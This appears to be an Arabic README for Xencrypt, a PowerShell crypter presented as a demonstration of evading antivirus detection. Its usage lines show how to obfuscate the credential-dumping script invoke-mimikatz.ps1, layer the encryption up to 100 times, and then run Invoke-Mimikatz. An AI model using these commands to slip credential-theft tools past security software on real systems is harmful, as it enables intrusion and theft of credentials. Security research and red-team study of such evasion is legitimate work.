
أداة لتجنب اكتشاف مضادات الفيروسات باستخدام سكريبت PowerShell
Xentropy ( @SamuelAnttila )
SecForce ( @SECFORCE_LTD )
إذا كنت تريد قراءة عن التصميم وراء هذه الأداة وكيفية صنع مشفر خاص بك، فهناك مقال كتبته عنها هنا: كتابة مشفر بأي لغة
لا تكن متسول سكريبتات، لقد جعلت هذه الأداة تحت رخصة GPLv3 حتى تتمكن من إجراء تعديلاتك الخاصة. هذه الأداة مُصمَّمة كعرض توضيحي لمدى سهولة كتابة مشفر خاص بك. إنها تعمل للغرض المخصص لها ولن أقوم بتصحيحها لتناسب احتياجاتك.

Xencrypt:
Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1
سيكون لديك الآن ملف xenmimi.ps1 مُشفَّر في دليل عملك الحالي. يمكنك استخدامه بنفس طريقة استخدام السكريبت الأصلي، لذا في هذه الحالة:
Import-Module ./xenmimi.ps1
Invoke-Mimikatz
كما يدعم الطبقات المتكررة عبر الوسم -Iterations.
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 100
تحذير: قد تكبر الملفات وقد يستغرق إنشاء ملف الإخراج وقتًا طويلاً جدًا اعتمادًا على السكريبتات وعدد التكرارات المطلوبة.